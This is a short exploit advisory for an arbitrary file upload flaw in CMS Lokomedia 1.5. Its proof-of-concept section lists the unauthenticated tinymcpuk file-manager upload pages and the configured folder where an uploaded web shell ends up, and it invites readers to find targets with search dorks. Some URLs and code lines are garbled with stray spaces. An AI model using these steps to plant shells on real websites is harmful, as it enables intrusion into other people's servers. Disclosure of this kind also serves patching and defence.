CMS Lokomedia is a php-based content management system. CMS Lokomedia 1.5 has the Arbitrary File Upload Vulnerability, which may cause attackers to obtain the website shell.
[+] Info:
~~~~~~~~~
CMS Lokomedia 1.5 Arbitary file upload vulnerability
Software: CMS Lokomedia
Vendor: http://bukulokomedia.com/home
Vuln Type: Arbitary file upload
Download link: http://bukulokomedia.com/lokomedia-1.5.rar
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com
Home: www.eidelweiss.info
DORK: use your skill and play your imagination: P
[+] Poc:
~~~~~~~~~
[!] Html "> http: // host/path_to_lokomedia/tinymcpuk/filemanager/browser.html // upload your file here or
[!] Http: // host/tinymcpuk/filemanager/browser.html or
[!] Http: // host // tinymcpuk/filemanager/frmupload.html or
[!] Http: // host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
Your shell or file will be placed here
/* Path to user files relative to the document root (no trailing slash )*/
$ Fckphp_config [UserFilesPath] = "./lokomedia/tinymcpuk/gambar"; // <= here
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$ Fckphp_config [UserFilesPath] = "./tinymcpuk/gambar"; * /// <= or here